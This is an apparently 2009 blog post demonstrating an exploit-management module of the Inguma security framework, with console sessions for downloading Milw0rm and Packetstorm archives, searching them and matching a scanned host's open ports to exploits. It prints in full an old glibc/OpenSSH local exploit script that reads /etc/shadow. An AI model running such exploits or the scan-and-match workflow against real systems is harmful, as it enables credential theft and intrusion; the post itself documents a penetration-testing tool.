Thursday 15 January 2009

Exploits for all!

It's been a while since my last post, as always ;), and today we are going to see a new module that almost every Inguma's user has been waiting.

Actually the Inguma's development team is just two persons and the project is still young and lacks many features but one of them is even more necessary: exploits. Inguma itself requires lots of development so we can't spent much more time developing exploits but with this module I will try to solve this problem a little.

The new module, called 'localxpl' (local exploits), will allow Inguma to download and manage exploits from two important exploits repositories: Milw0rm an Packetstorm. Let's see it in action in order to see what and how can do this new module. The new module can be found under the category 'exploits' and once you type 'localxpl' you will enter into it's interface:
inguma> show exploits

List of exploit modules
-----------------------

(...)
localxpl      A Module to fetch and manage exploits from many sources
(...)

inguma> localxpl
Exploits from Milw0rm not yet downloaded
Exploits from Packetstorm not yet downloaded

Actual remotedb selected: milw0rm
LOCXPL>

We can see that it informs us that we haven't downloaded any exploit yet and that, by default, the repository to work with is milw0rm. To see the options we have just to type 'help':
LOCXPL> help

Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb
help                         Show this help
exit                         Exits the DDBB

As we have no local repository yet, the options shown are just a few: select the repository to get (milw0rm or packetstorm) and download the exploits from the selected repository. As we have no other choice with milw0rm selected, let's download the exploits with the command 'fetch' and see the new options:
LOCXPL> fetch
Dir:  /inguma/modules/exploits/
Downloading  http://www.milw0rm.com/sploits/milw0rm.tar.bz2
Extracting files...
Exploits successfully downloaded on Thu Jan 15 20:19:38 2009
Operation Complete

Now we know that exploits are going to be stored under directory exploits and that the download finished fine; the path to store the exploits can be modified easily on the source of the module. Type 'help' again to see the new options:
Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb

Manage Milw0rm DDBB commands
----------------------------

list                         Shows list of local exploits. VERY VERBOSE
search                       Search exploits; use the 'tag' variable
Example: to search for windows exploits
'tag Windows'
rport                        Shows exploits afecting a remote port
Define the port using command 'port 22'
Port must be numeric: 22 intead of SSH
correlate                    Searches the DDBB for all exploits matching rport
for all the ports of a scaned machine. Specify
target machine with 'target 192.168.0.1'
Be sure to scan the machine before!
show                         Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'

help                         Show this help
exit                         Exits the DDBB

Now that we have some exploits downloaded we have some more operations to perform with them. For example we can list all the exploits downloaded from milw0rm just by typing 'list' but this will output lots of them so... Also we can now search all the exploits for a given keywords just by setting it with the commands 'tag' and 'search':
LOCXPL> tag openssh
New search tag:  openssh
LOCXPL> search
Searching milw0rm local DDBB for tag: openssh
./platforms/linux/local/258.sh glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x

We got one match for an exploit related to 'OpenSSH' and now we can get more information just by displaying its contents; just set the path to th exploit using the command 'xplpath' and the path you got from the search results and type show:
LOCXPL> xplpath ./modules/exploits/milw0rm/platforms/linux/local/258.sh
./modules/exploits/milw0rm/platforms/linux/local/258.sh set to show.

LOCXPL> show
# Charles Stevenson 
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path

ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow        # File to read
###############################################################################

echo "$ssh"
echo "[*] Checking permisions..."

if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi

export RESOLV_HOST_CONF=$FILE

echo "[*] Glibc bug found by Charles Stevenson "
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export  RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv |  cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '

# milw0rm.com [2001-01-25]

Another option is to list all the exploits affecting a given remote port using the command 'rport' after specifying the remote port with the command 'port' as explained in the help; the command 'correlate' will be shown late on this post.

Now that we have seen what we can do with the Milw0rm repository let's see what can we do with Packetstorm; first we switch to packetstorm with the command 'remotedb' and type help:
LOCXPL> remotedb packetstorm
New remotedb selected:  packetstorm
LOCXPL> help

Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb
years                        A space separated list of years to fetch
Example: 'years 06 07 08'
help                         Show this help
exit                         Exits the DDBB

As with milw0rm, until we get the exploits we have few choices. But now we have one difference, packetstorm classify it's exploits by year so we can specify the years we want to fetch with the command 'years'; by default exploits from the years 2007/08 will be downloaded.
LOCXPL> years 08
Years:  ['08']
LOCXPL> fetch
Dir:  /inguma/modules/exploits/packetstorm/
Start: 2008
Downloading: http://packetstormsecurity.org/0812-exploits/2008-exploits.tgz ...
Done. Extracting files...
Done: 2008
Exploits successfully downloaded on Thu Jan 15 20:28:44 2009

Almost the same as with milw0rm till now. From now on if we fetch exploits from milw0rm or packetstorm they will be updated, and if we specify 'years 07 08' and fetch again only the exploits of year 2007 will be downloaded. So let's see the new options we have now for the packetstorm repository:
Inguma's Local Exploit DDBB Help
--------------------------------

remotedb                     Database to work with: milw0rm or packetstorm
fetch                        Download exploits from remotedb
years                        A space separated list of years to fetch
Example: 'years 06 07 08'

Manage Packetstorm DDBB commands
--------------------------------

list                         Shows list of local exploits. VERY VERBOSE
Also navigate the exploits listing going with
your browser to, for example:
/inguma/modules/exploits/packetstorm/08-exploits/0801-exploits/index.html
search                       Search exploits; use the 'tag' variable
Example: to search for windows exploits
Example: 'tag Windows Vista'
Optionaly append a year to search only on exploits of this year
Example: 'year 08'
show                         Shows selected exploit source code
Select exploit using xplpath command:
'xplpath path/to/exploit'

help                         Show this help
exit                         Exits the DDBB

As we can see options are almost the same that we have with milw0rm but here we can't search by port; if look at the help of the command list we can see that we can browse the exploits of this repository by opening the file index.html that exists on each directory of the repository, just change year and month on the path.

And the last command we are going to see is the 'correlate' that we can find in the milw0rm help. With this command we can automatically search all the exploits that may affect all the ports that have been reported open by the port scans. So, the first thing we need to perform is a port scan:
inguma> target = '192.168.0.1'
inguma> tcpscan
Scanning port 17004 (417/417)
Open ports
----------

Port 1720 is open
Port 23/telnet is open

Once we get the open ports for this target we enter into the 'localxpl' interface to correlate the results with the existing exploits. As we already have downloaded the exploits we are now informed with the dates of the downloads so we can decide if we need to update.
inguma> localxpl
Last Milw0rm DDBB update: Thu Jan 15 20:19:38 2009
Last Packetstorm DDBB update: Thu Jan 15 20:28:44 2009

Actual remotedb selected: milw0rm

Now we just need to specify the target we have scanned and we want to correlate and launch the command 'correlate':
LOCXPL> target 192.168.0.1
Target set for correlation: 192.168.0.1

LOCXPL> correlate
Searching exploits available on milw0rm DDBB for port TCP/23

/inguma/modules/exploits/milw0rm/rport/23/346.c
/inguma/modules/exploits/milw0rm/rport/23/3293.sh
/inguma/modules/exploits/milw0rm/rport/23/254.c
/inguma/modules/exploits/milw0rm/rport/23/621.c
/inguma/modules/exploits/milw0rm/rport/23/89.c
/inguma/modules/exploits/milw0rm/rport/23/409.c

Searching exploits available on milw0rm DDBB for port TCP/1720

No exploits found for port TCP/1720

Ok, this is not enough to get accurate results but it's a starting point so, once I improve the scanning modules, to get and store also information about the services listening on each port that's all we have.

So that's all folks; I hope that I will improve this module soon and also get new interesting ones. To finish, a tip for my next module: PIG. ;)

Contributors